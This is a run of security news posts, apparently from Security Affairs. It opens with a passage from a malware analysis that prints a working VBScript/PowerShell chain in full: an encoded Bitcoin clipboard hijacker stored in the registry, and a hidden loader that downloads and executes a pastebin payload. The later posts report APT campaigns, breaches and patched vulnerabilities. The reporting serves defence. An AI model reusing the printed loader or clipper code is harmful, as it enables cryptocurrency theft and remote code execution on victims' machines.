CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\mogale”, “$cici=@(102,117,110,99,116,105,111,110,32,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,91,115,116,114,105,110,103,93,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,10,123,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,91,48,93,32,45,110,101,32,39,49,39,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,115,116,114,76,101,110,103,116,104,32,61,32,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,46,108,101,110,103,116,104,10,9,105,102,40,36,115,116,114,76,101,110,103,116,104,32,45,108,116,32,50,54,32,45,111,114,32,36,115,116,114,76,101,110,103,116,104,32,45,103,116,32,51,53,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,118,97,108,105,100,82,101,103,101,120,32,61,32,39,94,91,97,45,122,65,45,90,48,45,57,92,115,93,43,36,39,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,111,116,109,97,116,99,104,32,36,118,97,108,105,100,82,101,103,101,120,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,114,101,116,117,114,110,32,36,116,114,117,101,10,125,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,32,61,32,40,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,41,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,46,108,101,110,103,116,104,10,36,105,32,61,32,48,10,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,34,34,10,119,104,105,108,101,40,49,41,10,123,10,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,61,32,71,101,116,45,67,108,105,112,98,111,97,114,100,10,9,105,102,40,40,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,41,32,45,99,101,113,32,36,116,114,117,101,32,45,97,110,100,10,9,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,101,32,36,111,108,100,65,100,100,114,101,115,115,83,101,116,41,10,9,123,10,9,9,83,101,116,45,67,108,105,112,98,111,97,114,100,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,105,32,61,32,40,36,105,32,43,32,49,41,32,37,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,10,9,125,10,125);[System.Text.Encoding]::ASCII.GetString($cici)|IEX” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe ((gp HKCU:\Software).mogale)|IEX”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 7

Even in this case there is a powershell script embedded in it using the same variable name “$cici”, but with the following body:

function isBitcoinAddress([string]$clipboardContent){ if($clipboardContent[0] -ne ‘1’) { return $false }
$strLength = $clipboardContent.length if($strLength -lt 26 -or $strLength -gt 35) { return $false }
$validRegex = ‘^[a-zA-Z0-9\s]+$’ if($clipboardContent -cnotmatch $validRegex) { return $false }
return $true}$bitcoinAddresses = (“19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”)$bitcoinAddressesSize = $bitcoinAddresses.length$i = 0$oldAddressSet = “”while(1){ $clipboardContent = Get-Clipboard if((isBitcoinAddress($clipboardContent)) -ceq $true -and $clipboardContent -cne $oldAddressSet) { Set-Clipboard $bitcoinAddresses[$i] $oldAddressSet = $bitcoinAddresses[$i] $i = ($i + 1) % $bitcoinAddressesSize }}

Code Snippet 8

The script performs a constant check in the clipboard of the victim machine, looking for bitcoin addresses and some of them are also hardcoded. The last stage is UyFaSxgj:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/eyGv9x4B’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 9

This component spawn through powershell a script a binary file from a pastebin, eyGv9x4B, but, unfortunately, at the time of analysis, the paste has been removed.

This example could suggest to us the power of the malicious infrastructure built from the attacker, where  components could be removed or replaced with another one in every moment.

The Payload

As previously stated, the final payload is AgentTesla. It remains one of the most adopted commodity malware instructed to steal a large number of sensitive information about the victim. During the past years, we constantly studied the evolution of this threat and we enumerated all the sensitive data grasped by it. 

However, also in this case, we obtained the final payload and the configuration of the SMTP client where sends the stolen information:

Figure 13: Configuration of the AgentTesla SMTP client

The domain “atn-com.pw” has been created ad-hoc in order to manage the infection campaign. Studying the uptime of the domain we were able to reconstruct the infection campaign of the threat actor.


Figure 14: Information about the C2 uptime stats

As shown above, the domain has been registered on the last days of january and it has been active since the middle of April. After a short period of inactivity, it compared another time the 2nd of May since these days.

Conclusion

The actor hiding behind this campaign can undoubtedly be considered a persistent cyber-threat to many organizations operating in production sectors in Europe and, in the last months, also in Italy. Its intricate infection chain developed and tested during the years gave him the flexibility needed to bypass many layers of traditional security defences, manipulating the delivery infrastructure from time to time.

During the time, the actor’s delivery infrastructure was leveraged to install different kinds of malware: most of the time remote access trojans and info and credential stealing software. Such malware types are capable of enabling cyber-espionage and IP theft operations, potentially to re-sell stolen information on dark markets.

No doubt, we will keep going to track this threat.

Additional details, including IoCs and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – Italian manufacturing, hacking)

The post Cyber-Criminal espionage Operation insists on Italian Manufacturing appeared first on Security Affairs.

Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

Researchers from the Microsoft Security Intelligence team provided some details on a new massive phishing campaign using COVID-19 themed emails.

The messages used weaponized Excel documents, the IT giant observed a spike in the number of malicious documents in malspam campaigns which use Excel 4.0 macros.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.” states Microsoft in a Tweet.

The latest COVID-19 campaign began in April, the messages purport to be from the Johns Hopkins Center and use an Excel attachment. Once opened the attachment, it will show a graph of Coronavirus cases in the United States and trick the victims into enabling the macros to start the infection.

The macros drop a remote access tool (RAT) named NetSupport Manager, it is a legitimate application that is abused by attackers to take control over victim systems.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines.” continues Microsoft.

The NetSupport RAT employed in this COVID-19-themed campaign also drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. Then it connects to a command and control server, allowing threat actors to send further commands.

Below the Indicators of Compromise (IoCs) shared by Microsoft:

Below a list or recommendations to avoid this threat:

  • Keep your anti-virus software up to date.
  • Search for existing signs of the threat using IoCs in your environment.
  • Keep applications and operating systems running and up to date.
  • Be vigilant with attachments and links in emails.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Microsoft warns of “massive campaign” using COVID-19 themed emails appeared first on Security Affairs.

Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry

The Winnti hacking group continues to target gaming industry, recently it used a new malware named PipeMon and a new method to achieve persistence.

Winnti hacking group is using a new malware dubbed PipeMon and a novel method to achieve persistence in attacks aimed at video game companies.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, Group 72, Blackfly, and APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

PipeMon is a modular backdoor that was spotted by ESET researchers earlier this year on servers belonging to several developers of massively multiplayer online (MMO) games from South Korea and Taiwan. Each component of the backdoor is implemented by a DLL.

“In February 2020, we discovered a new, modular backdoor, which we named PipeMon. Persisting as a Print Processor, it was used by the Winnti Group against several video gaming companies that are based in South Korea and Taiwan and develop MMO (Massively Multiplayer Online) games.” reads the report published by the company. “Video games developed by these companies are available on popular gaming platforms and have thousands of simultaneous players.”

winnti backdoor gaming

In one case analyzed by the researchers, the hackers compromised a victim’s build system, then they have planted malware inside the video game executable. In another case, the Winnti group compromised the game servers were compromised, which could have allowed the attackers to conduct several malicious actions, including the manipulation of in-game currencies for financial gain.

Experts noticed that the PipeMon backdoor was signed with a certificate belonging to a video game company that was already hacked by Winnti in 2018.

Researchers also reported that the threat actors reused some C2 domains involved in other campaigns and used a custom login stealer that was previously associated with Winnti operations.

The experts discovered two PipeMon variants, but they were able to describe the infection process and how it has achieved persistence only for one of them.

The first stage of the PipeMon backdoor consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher.

The hackers achieved persistence by using the Windows print processors (DLLs). A malicious DLL‌ loader drops where the print processors reside and registered as an alternative print processor by modifying one of the two registry values:

HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll”
 
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll”

After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe) to load the malware.

Since the service starts every time the computer reboot, the attackers have achieved persistence.

“After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets.” continues the report.

“This technique is really similar to the Print Monitor persistence technique (being used by DePriMon, for example) and, to our knowledge, has not been documented previously.”

PipeMon modules are DLLs exporting a function called IntelLoader and are loaded using a reflective loading technique.

The loader, responsible for loading the main modules (ManagerMain and GuardClient) is Win32CmdDll.dll and is stored in the Print Processors directory. Experts noticed that modules are stored encrypted on disk at the same location with inoffensive-looking names.

Experts also spotted an updated version of PipeMon for which they were able to retrieve the first stage. Its architecture is highly similar to the original variant, but its code was rewritten from scratch.

“Once again, the Winnti Group has targeted video game developers in Asia with a new modular backdoor signed with a code-signing certificate likely stolen during a previous campaign and sharing some similarities with the PortReuse backdoor. This new implant shows that the Winnti Group is still actively developing new tools using multiple open source projects; they don’t rely solely on their flagship backdoors, ShadowPad and the Winnti malware.” concludes ESET.

Pierluigi Paganini

(SecurityAffairs – Winnti, hacking)

The post Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry appeared first on Security Affairs.

Santander, one of the biggest European banks, was leaking sensitive data on their website

Santander Consumer Bank, the Belgian branch of the bank, had a misconfiguration in its blog domain that was allowing its files to be indexed.

Our new research recently discovered a security issue with Santander, the 5th largest bank in Europe and the 16th largest in the world. This Spanish multinational bank controls approximately $1.4 trillion in total assets globally, and has a $69.9 billion total market capitalization on the Euro Stoxx 50 stock market index.

Our analysts found that the Belgian branch, Santander Consumer Bank, has a misconfiguration in its blog domain, allowing its files to be indexed. 

When we looked through these files, we were able to see sensitive information, including an SQL dump and JSON file that can be used by hackers to potentially phish Santander’s bank customers.

We contacted Santander immediately when we discovered the misconfiguration on April 15.  Representatives from the leading European bank responded to our emails and seem to have fixed the issue, as we are presently unable to access the information.

A Santander Consumer spokesperson said:

“The incident highlighted relates specifically to the Santander Consumer Bank Belgium blog only. The blog contains only public information and articles, and therefore no customer data or critical information from the blog  has been compromised. Our security team has already fixed the issue to ensure the blog is secure.”

What exactly is wrong with the Santander website?

When we visited the Santander blog on its Belgian domain, we noticed that the www endpoint of the blog subdomain had a misconfiguration that allowed all of its files to be indexed by search engines

Included in these indexed files was an important info.json file that seemed to contain its Cloudfront API keys.

Cloudfront is a Content Display Network (CDN) created by Amazon. Websites use CDNs to host large files, such as videos, PDFs, large images and other static content, that would normally slow down their own websites. Because these large files are hosted on the CDNs instead, websites are faster for users.

If a hacker were to get a hold of Santander’s apparent Cloudfront API keys, they would be able to switch out the content hosted on Cloudfront with any other content

For example, if a PDF or Word document was hosted on Cloudfront, and this document contained sensitive information – such as what accounts a customer should send money to – then the hacker would be able to switch that document out with their own version. In that way, they’d be able to change the real account number to his own, and thereby steal the customer’s money.

If a static HTML file was hosted, then the hacker would be able to switch that out with an entire webpage, allowing them to create a phishing page to steal the user’s financial information, all while on Santander’s official Belgian domain.

How to protect yourself

On April 15, we notified Santander’s Belgian website of the misconfiguration, and on April 24 they responded and seem to have fixed the issue. Their CyberSecurity Team stated: “We take cyber security seriously and strive to maintain the highest security standards and best practices and welcome responsible disclosure attitudes in security researchers.”

When we checked for the misconfiguration again on April 27, we received the following message:

Forbidden

You don’t have permission to access this resource.

For Santander’s customers, as well as all other banking customers, we’d recommend that you always check the domain and subdomain that a suspicious bank email is sending you to. Make sure that the domain is the bank’s real domain, but also know that important financial information requests would never be hosted on the blog subdomain of a bank.

Editor’s note: this article was updated on May 19 to reflect new information in collaboration with BitSight that the keys may not have been active Cloudfront API keys at the time of our discovery.

Original post:

https://cybernews.com/security/one-of-biggest-european-banks-leaking-sensitive-data-on-website/

About the author: Bernard Meyer

Bernard Meyer is the Senior Researcher at CyberNews. He has a strong passion for security in popular software, maximizing privacy online, and keeping an eye on governments and corporations. He’s been featured in Fortune, Forbes, Wired, Mirror, TechRadar and more. You can usually find him on Twitter arguing with someone about something moderately important.

Pierluigi Paganini

(SecurityAffairs – Santander, hacking)

The post Santander, one of the biggest European banks, was leaking sensitive data on their website appeared first on Security Affairs.

Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware

Hackers attempted to exploit a zero-day flaw in the Sophos XG firewall to distribute ransomware to Windows machines, but the attack was blocked.

Threat actors attempted to exploit a zero-day (CVE-2020-12271) in the Sophos XG firewall to spread ransomware to Windows machines, the good news is that the attack was blocked by a hotfix issued by Sophos.

At the end of April, cybersecurity firm Sophos has released an emergency patch to address an SQL injection zero-day vulnerability affecting its XG Firewall product that has been exploited in the wild.

Sophos was informed of the attacks exploiting the zero-day issue by one of its customers on April 22. The customer noticed “a suspicious field value visible in the management interface.”

Sophos investigated the incident and determined that hackers were targeting systems configured with either the administration (HTTPS service) or the User Portal exposed on the WAN zone.

The attackers exploited an SQL injection zero-day vulnerability to gain access to exposed XG devices.

“The attack used a previously unknown SQL injection vulnerability to gain access to exposed XG devices.” reads the advisory published by Sophos.

“It was designed to download payloads intended to exfiltrate XG Firewall-resident data. The data for any specific firewall depends upon the specific configuration and may include usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access.” “Passwords associated with external authentication systems such as AD or LDAP are unaffected. At this time, there is no indication that the attack accessed anything on the local networks behind any impacted XG Firewall.”

The hackers exploited the SQL injection flaw to download malicious code on the device that was designed to steal files from the XG Firewall.

Hackers exploited the issue to install the Asnarök Trojan that allowed the attackers to steal files from the XG Firewall and use the stolen info to compromise the network remotely.

The Trojan could be used to steal sensitive data including usernames and hashed passwords for the firewall device admin, and user accounts used for remote access. Login credentials associated with external authentication systems (i.e. AD, LDAP) are not impacted by the flaw.

According to a report published by Sophos at the end of April, the malware employed in the attack is able to retrieve firewall resident information, including:

  • The firewall’s license and serial number
  • A list of the email addresses of user accounts that were stored on the device, followed by the primary email belonging to the firewall’s administrator account
  • Firewall users’ names, usernames, the encrypted form of the passwords, and the salted SHA256 hash of the administrator account’s password. Passwords were not stored in plain text.
  • A list of the user IDs permitted to use the firewall for SSL VPN and accounts that were permitted to use a “clientless” VPN connection.

Below the attack scenario described by Sophos:

Sophos pushed a hotfix to the firewalls after the discovery of the attacks.

This hotfix eliminated the SQL injection vulnerability, stopped the XG Firewall from accessing any infrastructure under the control of the attacks, and cleaned up any remnants from the attack.

Sophos’s update also added a special box in the XG Firewall control panel to allow users to determine if their device has been compromised.

In the new wave of attacks, hackers exploited the issue to distribute the Ragnarok Ransomware.

“Since we published our first report, the attackers first modified their attack to attempt to use what we previously described as the “backup channel.” This was a Linux shell script that served as a dead man switch—a portion of the attack intended to trigger only under certain circumstances; in this case, if a specific file the attackers created during the attack gets deleted.” continues the report.

To deploy the Ragnarok ransomware, attackers attempted to leverage the EternalBlue and DoublePulsar exploits.

“Ragnarok is a less common threat than other ransomware, and it appears that this threat actor’s modus operandi – and the tooling they employ to deliver this ransomware—is quite different from those of many other threat actors. It was a rare and notable event to observe a Linux ELF application being used to try to spread malware across platforms to Windows computers.” concludes the report.

“This incident highlights the necessity of keeping machines inside the firewall perimeter up to date, and serves as a reminder that any IOT device could be abused as a foothold to reach Windows machines.”

Pierluigi Paganini

(SecurityAffairs – Sophos XG firewall, hacking)

The post Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware appeared first on Security Affairs.

Meal delivery service Home Chef discloses data breach

Meal delivery service Home Chef has confirmed that it recently suffered a security breach that exposed its customer information.

Meal delivery service Home Chef has disclosed a data breach that exposed its customer information. Home Chef also explained that only a portion ot its customers were impacted in the security incident.

In early May, Shiny Hunters hacking group started offering for sale the databases containing tens of millions from user records from over 11 companies.

Below the complete list published by BleepingComputer:

CompanyUser RecordsPrice
Tokopedia91 million$5,000
Home Chef8 million$2,500
Bhinneka1.2 million$1,200
Minted5 million$2,500
Styleshare6 million$2,700
Ggumim2 million$1,300
Mindful2 million$1,300
StarTribune1 million$1,100
ChatBooks15 million$3,500
The Chronicle Of Higher Education3 million$1,500
Zoosk30 million$500

At the time, the Shiny Hunters were offering more than 8 million records for $2500.

Now the company confirmed the data breach, saying that the incident has impacted select customer information.

Exposed data includes email addresses, names, phone numbers, hashed passwords, and the last four digits of credit card numbers.

“Was My Credit Card Information Compromised? Home Chef does not store complete credit or debit card information” reads the FAQ published by the company.

“Information such as frequency of deliveries and mailing address may also have been compromised,”.

Home Chef also underlined the fact that it does not store complete credit or debit card information. The company is investigating the incident and announced that it is taking action to strengthen its security defenses and prevent similar incidents in the future.

Although the company stores passwords in encrypted format, it recommends users to change the password in an abundance of caution following these process:

  1. Visit www.homechef.com
  2. Click on “Log in”
  3. Click on “Account Information”, which is located under the “Account” dropdown menu
  4. Complete the “Change Your Password” section and click “Save your settings.” There’s no need to adjust the other sections on the Account page (e.g. “Subscription”)

Home Chef users should remain vigilant against phishing attacks and suspicious activity in their accounts.

The company is notifying the incident to the impacted users.

Pierluigi Paganini

(SecurityAffairs – HomeChef, hacking)

The post Meal delivery service Home Chef discloses data breach appeared first on Security Affairs.

Tens of thousands Israeli websites defaced

Thousands of Israeli websites have been defaced earlier today, hackers published an anti-Israeli message on their homepage and attempted to implant malicious code.

A massive hacking campaign defaced thousands of Israeli websites, attackers published an anti-Israeli message on their homepage and attempted to inject a malware seeking permission to access visitors’ webcams.

“Be ready for a big surprise” “The countdown of Israel destruction has begun since a long time ago,” reads the message published in in Hebrew and English on the defaced Israeli websites.

A video published by the hackers shows explosions in Tel Aviv and a battered and bloodied Prime Minister Benjamin Netanyahu swimming away from a burning city.

The hackers also added a link on some websites, asking users to click on the link and activate their camera

The list of hacked websites belong to local municipalities, several NGOs, popular restaurant chains, and a left-wing Member of parliament.

The attacks were carried out by a group calling itself the “Hackers of Saviour” most of the hacked websites were hosted on the Israeli WordPress hosting service uPress. The hacker group’s YouTube channel describes the crew as collective seeking on avenging Israel’s policy on the Palestinian situation.

“Early this morning we detected a widespread cyber attack against many websites stored on our servers. It is a case of a malicious and far-ranging attack carried out by anti-Israel (Iranian) sources. We detected a weakness in a WordPress add on that enabled the hack and are working closely with the National Cyber Bureau to research the breach and fix the affected sites.” reads a statement from the company sent to Ynet News.

The hosting provider confirmed the attack and revealed that the hackers exploited a vulnerability in a WordPress plugin to compromise the Israeli websites. Below the message published by the company on Facebook:

הודעת עדכון: לקוחות יקרים, היום בשעה מוקדמת זיהנו מתקפת סייבר רחבת היקף על אתרים רבים שמאוחסנים אצלנו. מדובר במתקפה…

Gepostet von ‎אחסון וורדפרס – uPress‎ am Donnerstag, 21. Mai 2020

The company said it was working with Israeli authorities to investigate the hack. uPress also took down all defaced websites and pulled the file hackers were exploiting. The company is working to restore all the defaced websites.

“The Israel National Cyber Bureau, the government agency tasked with protecting Israel from hacking attacks confirmed that “a host of Israeli websites were hacked in the morning hours in a suspected Iranian cyber-attack.”” reported the website Calcalistech.

“The matter is being handled by the Bureau. We recommend users refrain from pressing any links on compromised sites,”.

The hosting provider reported the incident to the authorities that launched an investigation into the attacks.

The Israeli National Cyber-Directorate (INCD), the Israeli cyber-security agency, warned users against visiting and interacting with the hacked websites.

Israeli press outlets blame Iranian hackers for the attacks, but at the time there is no concrete evidence to support this attribution.

Pierluigi Paganini

(SecurityAffairs – Israeli websites, hacking)

The post Tens of thousands Israeli websites defaced appeared first on Security Affairs.

Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia

Cybersecurity researchers uncovered an Iranian cyber espionage campaign conducted by Chafer APT and aimed at critical infrastructures in Kuwait and Saudi Arabia.

Cybersecurity researchers from Bitdefender published a detailed report on an Iranian cyber espionage campaign directed against critical infrastructures in Kuwait and Saudi Arabia.

The cyber espionage campaigns were carried out by Iran-linked Chafer APT (also known as APT39 or Remix Kitten).

The Chafer APT group has distributed data stealer malware since at least mid-2014, it was focused on surveillance operations and the tracking of individuals.

The APT group targets telecommunication and travel industries in the Middle East to gather intelligence on Iran’s geopolitical interests.

“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” reads the researcher paper published by the experts.

“Some traces indicate that the goal of the attack was data exploration and exfiltration (on some of the victim’s tools such as Navicat, Winscp, found in an unusual location, namely “%WINDOWS%\ime\en-us-ime”, or
SmartFtpPasswordDecryptor were present on their systems).”

The attackers used several tools, including ‘living off the land’ tools, making it hard to attribute the attack to specific threat actors, as well as a custom-built backdoor.

The attacks against entities in Kuwait and Saudi Arabia have multiple similarities and shares some common stages, but experts noticed that the attacks seem more focused and sophisticated on victims from Kuwait.

Chafer APT launched spear-phishing attacks, the messages were used to deliver multiple backdoors that allowed them to gain a foothold, elevate their privileges, conduct internal reconnaissance, and establish persistence in the victim environment.

“Once the victims were compromised, attackers started to bring reconnaissance tools for network scanning (“xnet.exe”, “shareo.exe”) and credential gathering (as “mnl.exe” or “mimi32.exe”) or tools with multiple functionalities, such as CrackMapExec (for users’ enumeration, share listing, credentials harvesting and so on).” continues the report.

“During our investigation, on some of the compromised stations we observed some unusual behavior performed under a certain user account, leading us to believe the attackers managed to create a user account on the victims’ machine and performed several malicious actions inside the network, using that account.”

The attacks against entities in Kuwait appeared more sophisticated, attackers were creating a user account on the compromised machines and performed malicious actions inside the network, including credential harvesting with Mimikatz and lateral movements using multiple hacking tools from their arsenal.

Most of the hacking activity occurs on Friday and Saturday, coinciding with the weekend in the Middle East.

The campaign against a Saudi Arabian entity was characterized by the large use of social engineering attacks to trick the victim into executing a remote administration tool (RAT), The RAT employed in the attacks shares similarities with those used against Kuwait and Turkey.

“The case investigated in Saudi Arabia was not as elaborate, either because the attackers did not manage to further exploit the victim, or because the reconnaissance revealed no information of interest.” continues the report.

“While this attack was not as extensive as the one in Kuwait, some forensic evidence suggests that the same attackers might have orchestrated it. Despite the evidence for network discovery, we were not able to find any traces for lateral movement, most probably because threat actors were not able to find any vulnerable machines.”

The campaigns against Kuwait and Saudi Arabia demonstrate the intense cyberespionage activity carried out by Iran-linked APT groups in the Middle East. Anyway we cannot underestimate that these hacking groups are extending their range of action targeting government and organizations worldwide.

Pierluigi Paganini

(SecurityAffairs – Chafer APT, hacking)

The post Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia appeared first on Security Affairs.

Japan suspects HGV missile data leak in Mitsubishi security breach

Japan continues to investigate a cyberattack that hit this year Mitsubishi Electric Corp., it suspects a possible leak of data including details of a prototype missile.

Japan is still investigating a cyberattack that was disclosed by Mitsubishi Electric Corp. early this year.

In January, the company disclosed a security breach that might have exposed personal and confidential corporate data, at the time, it claimed that attackers did not obtain sensitive information about defense contracts.

Mitsubishi revealed that personal data on some 8,000 people also might have been leaked.

The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs.

The intrusion took place on June 28, 2019, and the company launched an investigation in September 2019. Mitsubishi Electric disclosed the security incident only after two local newspapers, the Asahi Shimbun and Nikkei, reported the security breach.

Mitsubishi Electric had also already notified members of the Japanese government and the Ministry of Defense.

Now, the authorities suspect a data leak that could have exposed details of a prototype missile.

“The suspected leak involves sensitive information about a prototype of a cutting-edge high speed gliding missile intended for deployment for the defense of Japan’s remote islands amid China’s military assertiveness in the region.” states the AP press agency.

“The ministry suspects the information might have been stolen from documents sent from several defense equipment makers as part of a bidding process for the project, Mitsubishi Electric did not win the bid, Japanese media reports said.”

The advanced prototype missile was designed to be deployed in Japan’s remote islands as a deterrence to military activities conducted by China in the area.

Chief Cabinet Secretary Yoshihide Suga announced that the Defense Ministry is investigating “the possible impact of the information leak on national security.”

Mitsubishi Electric

The Defense Ministry was working on a prototype of supersonic missile known as HGV, a technology also being studied by the U.S., China, and Russia.

In January, the two media outlets attributed the cyber attack to a China-linked cyber espionage group tracked as Tick (aka Bronze Butler).

The hacker group has been targeting Japanese heavy industry, manufacturing and international relations at least since 2012,

According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data.

The ministry suspects the information might have been stolen from documents sent from several defense equipment makers as part of a bidding process for the project, Mitsubishi Electric did not win the bid, Japanese media reports said.

Other Japanese defense contractors were hit by cyber attacks, including NEC Corp. , Pasco Corp. and Kobe Steel Ltd.

Pierluigi Paganini

(SecurityAffairs – Mitsubishi, hacking)

The post Japan suspects HGV missile data leak in Mitsubishi security breach appeared first on Security Affairs.

VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director

VMware has addressed a high-severity remote code execution vulnerability, tracked as CVE-2020-3956, that affects its Cloud Director product.

VMware has patched a high-severity remote code execution vulnerability, tracked as CVE-2020-3956, in its Cloud Director product.

The vulnerability is a code injection issue that could be exploited by an authenticated attacker to send malicious traffic to Cloud Director, which could allow executing arbitrary code.

“A code injection vulnerability in VMware Cloud Director was privately reported to VMware. Patches and workarounds are available to remediate or workaround this vulnerability in affected VMware products.” reads the security advisory published by VMware.

“An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.”

According to the company, the vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.

The vulnerability impacts VMware Cloud Director 10.0.x, 9.7.x and 9.5.x on Linux and Photon OS appliances, and version 9.1.x on Linux. Versions 8.x, 9.0.x and 10.1.0 are not affected.

VMware vCloud Director 9.1.0.4, 9.5.0.6, 9.7.0.5 and 10.0.0.2 addresses the issue. VMware has also released a workaround to mitigate the risk of attacks exploiting the issue.

The vulnerability was discovered by Tomáš Melicher and Lukáš Václavík of Citadelo.

A couple of weeks ago, VMware addressed vulnerabilities impacting the vRealize Operations Manager (vROps) product, including two recently disclosed Salt issues.

Earlier this month, VMware has addressed a critical information disclosure flaw, tracked as CVE-2020-3952, that could be exploited by attackers to compromise vCenter Server or other services that use the Directory Service (vmdir) for authentication.

